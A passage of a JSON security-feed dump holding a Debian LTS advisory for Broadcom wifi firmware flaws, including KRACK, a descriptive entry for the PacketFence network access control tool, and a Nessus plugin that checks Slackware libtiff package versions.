"operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "20161130-4~deb8u1", "arch": "all", "packageFilename": "firmware-netxen_20161130-4~deb8u1_all.deb", "packageName": "firmware-netxen", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "20161130-4~deb8u1", "arch": "all", "packageFilename": "firmware-amd-graphics_20161130-4~deb8u1_all.deb", "packageName": "firmware-amd-graphics", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "20161130-4~deb8u1", "arch": "all", "packageFilename": "firmware-linux_20161130-4~deb8u1_all.deb", "packageName": "firmware-linux", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "20161130-4~deb8u1", "arch": "all", "packageFilename": "firmware-myricom_20161130-4~deb8u1_all.deb", "packageName": "firmware-myricom", "operator": "lt"}], "description": "Package : firmware-nonfree\nVersion : 20161130-4~deb8u1\nCVE ID : CVE-2016-0801 CVE-2017-0561 CVE-2017-9417 CVE-2017-13077 \n CVE-2017-13078 CVE-2017-13079 CVE-2017-13080 CVE-2017-13081\nDebian Bug : 620066 724970 769633 774914 790061 793544 793874 795303\n 800090 800440 800820 801514 802970 803920 808792 816350\n\t\t 823402 823637 826996 832925 833355 833876 838038 838476\n\t\t 838858 841092 842762 854695 854907 856853 862458 869639\n\t\t 907320\n\nSeveral vulnerabilities have been discovered in the firmware for\nBroadcom BCM43xx wifi chips that may lead to a privilege escalation\nor loss of confidentiality.\n\nCVE-2016-0801\n\n Broadgate Team discovered flaws in packet processing in the\n Broadcom wifi firmware and proprietary drivers that could lead to\n remote code execution. However, this vulnerability is not\n believed to affect the drivers used in Debian.\n\nCVE-2017-0561\n\n Gal Beniamini of Project Zero discovered a flaw in the TDLS\n implementation in Broadcom wifi firmware. This could be exploited\n by an attacker on the same WPA2 network to execute code on the\n wifi microcontroller.\n\nCVE-2017-9417 / #869639\n\n Nitay Artenstein of Exodus Intelligence discovered a flaw in the\n WMM implementation in Broadcom wifi firmware. This could be\n exploited by a nearby attacker to execute code on the wifi\n microcontroller.\n\nCVE-2017-13077, CVE-2017-13078, CVE-2017-13079, CVE-2017-13080,\nCVE-2017-13081\n\n Mathy Vanhoef of the imec-DistriNet research group of KU Leuven\n discovered multiple vulnerabilities in the WPA protocol used for\n authentication in wireless networks, dubbed "KRACK".\n\n An attacker exploiting the vulnerabilities could force the\n vulnerable system to reuse cryptographic session keys, enabling a\n range of cryptographic attacks against the ciphers used in WPA1\n and WPA2.\n\n These vulnerabilities are only being fixed for certain Broadcom\n wifi chips, and might still be present in firmware for other wifi\n hardware.\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n20161130-4~deb8u1. This version also adds new firmware and packages\nfor use with Linux 4.9, and re-adds firmware-{adi,ralink} as\ntransitional packages.\n\nWe recommend that you upgrade your firmware-nonfree packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n\n-- \nBen Hutchings - Debian developer, member of kernel, installer and LTS teams\n", "edition": 1, "reporter": "Debian", "published": "2018-11-13T01:33:58", "title": "[SECURITY] [DLA 1573-1] firmware-nonfree security update", "type": "debian", "enchantments": {"score": {"modified": "2018-11-13T13:51:40", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-13079", "CVE-2017-13080", "CVE-2017-0561", "CVE-2017-13078", "CVE-2017-9417", "CVE-2016-0801", "CVE-2017-13081", "CVE-2017-13077"], "modified": "2018-11-13T01:33:58", "id": "DEBIAN:DLA-1573-1:A1DDB", "href": "https://lists.debian.org/debian-lts-announce/2018/debian-lts-announce-201811/msg00015.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "n0where": [{"lastseen": "2018-11-13T04:43:45", "references": ["https://github.com/inverse-inc/packetfence/releases"], "description": "PacketFence is a fully supported, trusted, Free and Open Source network access control (NAC) system. Boasting an impressive feature set including a captive-portal for registration and remediation, centralized wired and wireless management, 802.1X support, layer-2 isolation of problematic devices, integration with IDSs and vulnerability scanners; PacketFence can be used to effectively secure networks \u2013 from small to very large heterogeneous networks. \n\nPacketFence boastd an impressive feature set including a captive-portal for registration and remediation, centralized wired and wireless management, powerful BYOD management options, 802.1X support, layer-2 isolation of problematic devices; PacketFence can be used to effectively secure networks small to very large heterogeneous network. \n\n## Features: \n\n* * *\n\n * ### Out of band Deployment \n\nPacketFence\u2019s operation is completely out-of-band which allows the solution to scale geographically and to be more resilient to failures. When using the right technology (like port security), a single PacketFence server can be used to secure hundreds of switches and many thousands nodes connected to them.. \n\n * ### Inline Deployment \n\nWhile out-of-band is the preferred way of deploying PacketFence, an inline mode is also supported for unmanageable wired or wireless equipment. Deploying PacketFence using the inline mode can also be accomplished in minutes! Note also that the inline mode can coexist very well together with an out-of-band deployment. \n\n * ### 802.1X Support \n\nWireless and wired 802.1X is supported through a FreeRADIUS [External] module which is included in PacketFence. \n\n * ### Voice over IP support \n\n\u2013 Also called IP Telephony (IPT), VoIP is fully supported (even in heterogeneous environments) for multiple switch vendors (Cisco, Edge-Core, HP, LinkSys, Nortel Networks and many more). \n\n * ### Wireless integration \n\nPacketFence integrates perfectly with wireless networks through a FreeRADIUS [External] module. This allows you to secure your wired and wireless networks the same way using the same user database and using the same captive portal, providing a consistent user experience. Mixing access points (AP) vendors and wireless controllers is supported. \n\n * ### Registration of Devices \n\nPacketFence supports an optional registration mechanism similar to \u201ccaptive portal\u201d solutions. Contrary to most captive portal solutions, PacketFence remembers users who previously registered and will automatically give them access without another authentication. Of course, this is configurable. An Acceptable Use Policy can be specified such that users cannot enable network access without first accepting it. \n\n * ### Detection of abnormal network activities \n\nAbnormal network activities (computer virus, worms, spyware, traffic denied by establishment policy, etc.) can be detected using local and remote Snort [External], Suricata or commercial sensors. Beyond simple detection, PacketFence layers its own alerting and suppression mechanism on each alert type. A set of configurable actions for each violation is available to administrators. \n\n * ### Proactive vulnerability scans \n\nNessus [External] or OpenVAS [External] vulnerability scans can be performed upon registration, scheduled or on an ad-hoc basis. PacketFence correlates the Nessus/OpenVAS vulnerability ID\u2019s of each scan to the violation configuration, returning content specific web pages about which vulnerability the host may have. \n\n * ### Statement of Health \n\nWhile doing a 802.1X user authentication, PacketFence can perform a complete posture assessment of the connecting device using the TNC Statement of Health protocol. For example, PacketFence can verify if an antivirus is installed and up-to-date, if operating system patches are all applied and much more \u2013 all without any agent installed on the endpoint device! \n\n * ### Remediation through a captive portal \n\nOnce trapped, all network traffic is terminated by the PacketFence system. Based on the nodes current status (unregistered, open violation, etc), the user is redirected to the appropriate URL. In the case of a violation, the user will be presented with instructions for the particular situation he/she is in, reducing costly help desk intervention. \n\n * ### Isolation of problematic devices \n\nPacketFence supports several isolation techniques, including VLAN isolation with VoIP support (even in heterogeneous environments) for multiple switch vendors. \n\n * ### Command-line and Web-based management \n\nWeb-based and command-line interfaces for all management tasks. Web-based administration supports different permission-levels for users and authentication of users against LDAP or Microsoft Active Directory. \n\n* * *\n\n## Advanced Features: \n\n * Flexible VLAN Management and Role-Based Access Control \n * Guest Access \u2013 Bring Your Own Device (BYOD) \n * Portal Profiles \n * More Built-in Violation Types \n * Automatic Registration \n * PKI and EAP-TLS Support \n * Expiration \n * Device Management \n * Firewall Integration \n * Bandwidth Accounting \n * Floating Network Devices \n * Flexible Authentication \n * Microsoft Active Directory Integration \n * Routed Networks \n * Gradual Deployment \n * Pass-Through \n * High-Availability \n * Supported Hardware \n * Standards-Based \n * Extensible / Easily Customizable \n\n## Minimum Hardware Requirements \n\nThe following provides a list of the minimum server hardware recommendations: \n\n * Intel or AMD CPU 3GHz \n * 8 GB of RAM \n * 100 GB of disk space(RAID-1 recommended) \n * 1 Network card (2 recommended) \n\nPacketFence reuses many components in an infrastructure. Thus, it requires the following ones: \n\n * Database server (MySQL or MariaDB) \n * Webserver (Apache) \n * DHCP server (ISCDHCP) \n * RADIUS server (FreeRADIUS) \n\nDepending on your setup you may have to install additional components like: \n\n * NIDS(Snort/Suricata) \n\n[  ](<http://www.packetfence.org/documentation/guides.html>)\n\n[  ](<https://github.com/inverse-inc/packetfence/releases>)\n", "edition": 3, "reporter": "N0where", "published": "2018-11-13T01:00:56", "title": "Open Source Network Access Control: PacketFence", "type": "n0where", "enchantments": {"score": {"modified": "2018-11-13T04:43:45", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "tools", "cvelist": [], "modified": "2018-11-13T01:00:56", "toolHref": "https://github.com/inverse-inc/packetfence/releases", "id": "N0WHERE:3160", "href": "https://n0where.net/open-source-network-access-control", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2018-11-14T03:12:47", "references": ["http://www.nessus.org/u?05985ad4"], "pluginID": "118903", "description": "New libtiff packages are available for Slackware 14.2 and -current to fix security issues.", "edition": 1, "reporter": "Tenable", "published": "2018-11-13T00:00:00", "title": "Slackware 14.2 / current : libtiff (SSA:2018-316-01)", "type": "nessus", "enchantments": {"score": {"modified": "2018-11-14T03:12:47", "vector": "NONE", "value": 5.0}}, "naslFamily": "Slackware Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10779", "CVE-2018-10963", "CVE-2018-8905", "CVE-2018-18661", "CVE-2018-7456"], "modified": "2018-11-13T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:14.2", "p-cpe:/a:slackware:slackware_linux:libtiff", "cpe:/o:slackware:slackware_linux"], "id": "SLACKWARE_SSA_2018-316-01.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=118903", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2018-316-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118903);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2018/11/13 12:30:44\");\n\n script_cve_id(\"CVE-2018-10779\", \"CVE-2018-10963\", \"CVE-2018-18661\", \"CVE-2018-7456\", \"CVE-2018-8905\");\n script_xref(name:\"SSA\", value:\"2018-316-01\");\n\n script_name(english:\"Slackware 14.2 / current : libtiff (SSA:2018-316-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New libtiff packages are available for Slackware 14.2 and -current to\nfix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2018&m=slackware-security.360306\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?05985ad4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libtiff package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:libtiff\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/11/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/11/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"14.2\", pkgname:\"libtiff\", pkgver:\"4.0.10\", pkgarch:\"i586\", pkgnum:\"1_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"libtiff\", pkgver:\"4.0.10\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"libtiff\", pkgver:\"4.0.10\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"libtiff\", pkgver:\"4.0.10\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
